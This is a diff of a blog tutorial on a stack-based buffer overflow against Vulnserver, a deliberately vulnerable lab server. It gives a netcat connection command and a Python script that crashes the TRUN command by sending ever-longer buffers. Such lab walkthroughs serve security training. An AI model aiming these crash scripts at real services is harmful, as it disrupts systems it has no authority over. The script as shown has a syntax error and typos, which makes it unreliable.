Derpyho0ves/Derpyho0ves.github.io/_posts/2020-01-19-Vulnserver-Stack-Based-Buffer-Overflow.md

 ## Exploiting TRUN Command

 Now that we have basic setup done, we can start exploiting vulnserver via the TRUN command.
 First we can connect  to the server using netcat, by default vulnserver listens on port 9999.
-Connect with **nc -v 192.168.209.132 9999** we can also list the comamnds by issuing the comamnd **HELP** after connecting.
+Connect with **nc -v Windows VM IP 9999**, we can also list the commands by issuing the command **HELP** after connecting.

 ![exp1](/images/vulnserver/stack/exp1.PNG)

+First we create a fuzzing script with python that we can use to crash vulnserver.
+An example code could be spmethign like.

+'''python
+#!/usr/bin/python
+import sys, socket
+from time import sleep

+host = "192.168.209.133"
+port = 9999

+buffer = "A" * 100

+while True:
+         try:
+                s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+                s.connect((host,port))
+                s.send(('TRUN /.:/' + buffer))
+                s.close()
+                sleep(1)
+                buffer = buffer + "A" * 100

+         except:
+                 print "Fuzzing crashed at %s bytes" % str(len(buffer)) sys.exit()

+'''